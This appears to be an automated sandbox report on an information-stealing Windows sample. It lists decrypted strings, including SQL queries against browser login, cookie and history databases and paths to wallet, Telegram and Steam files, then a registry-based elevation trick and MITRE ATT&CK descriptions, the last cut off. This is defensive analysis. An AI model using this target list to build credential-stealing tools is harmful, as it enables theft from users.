Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: JohnDoe
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: DISPLAY
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: default3
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetFileAttributesA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GlobalLock
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: HeapFree
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetFileSize
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GlobalSize
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: IsWow64Process
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Process32Next
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetLocalTime
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: FreeLibrary
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetVolumeInformationA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Process32First
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetModuleFileNameA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: DeleteFileA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: FindNextFileA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: LocalFree
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: FindClose
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: LocalAlloc
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetFileSizeEx
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ReadFile
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SetFilePointer
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: WriteFile
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CreateFileA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: FindFirstFileA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CopyFileA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: VirtualProtect
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetLastError
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: lstrcpynA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: MultiByteToWideChar
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GlobalFree
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: WideCharToMultiByte
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GlobalAlloc
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: OpenProcess
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: TerminateProcess
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetCurrentProcessId
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: gdiplus.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ole32.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: bcrypt.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: wininet.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: shell32.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: psapi.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: rstrtmgr.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SelectObject
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: BitBlt
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: DeleteObject
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CreateCompatibleDC
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdiplusStartup
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdiplusShutdown
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdipDisposeImage
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GdipFree
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CoUninitialize
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CoInitialize
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CoCreateInstance
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: BCryptDecrypt
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: BCryptSetProperty
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: BCryptDestroyKey
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetWindowRect
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetDesktopWindow
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetDC
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CloseWindow
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: wsprintfA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CharToOemW
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: wsprintfW
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RegQueryValueExA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RegEnumKeyExA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RegOpenKeyExA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RegCloseKey
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RegEnumValueA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CryptUnprotectData
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SHGetFolderPathA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ShellExecuteExA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: InternetOpenUrlA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: InternetConnectA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: InternetCloseHandle
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: InternetOpenA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: HttpSendRequestA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: HttpOpenRequestA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: InternetReadFile
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: InternetCrackUrlA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: StrCmpCA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: StrStrA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: StrCmpCW
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: PathMatchSpecA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RmStartSession
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RmRegisterResources
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RmGetList
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: RmEndSession
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_open
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_step
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_column_text
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_finalize
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_close
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3_column_blob
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: encrypted_key
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: browser:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: profile:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: login:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: password:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Opera
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: OperaGX
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Network
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: cookies
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: FALSE
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: autofill
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: history
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: month:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Cookies
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Login Data
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: History
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: logins.json
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: formSubmitURL
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: usernameField
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: encryptedUsername
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: encryptedPassword
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: formhistory.sqlite
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: cookies.sqlite
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: places.sqlite
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: plugins
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Local Extension Settings
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: IndexedDB
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Opera Stable
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Opera GX Stable
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CURRENT
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: chrome-extension_
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Local State
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: profiles.ini
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: chrome
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: opera
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: firefox
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: wallets
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ProductName
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: DisplayName
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ProcessorNameString
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: DisplayVersion
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Network Info:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: System Summary:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Installed Apps:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Current User:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Process List:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: system_info.txt
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: freebl3.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: mozglue.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: msvcp140.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: softokn3.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: vcruntime140.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: runas
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: files
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Telegram
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Password
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Pidgin
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: accounts.xml
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: config.vdf
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: 00000001
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: 00000002
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: 00000003
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: 00000004
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: token:
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Software\Valve\Steam
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SteamPath
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: DialogConfig.vdf
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: libraryfolders.vdf
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: loginusers.vdf
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sqlite3.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: browsers
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: https
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: build
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: token
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: message
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Registry value created: DelegateExecute
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Registry value created: NULL "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
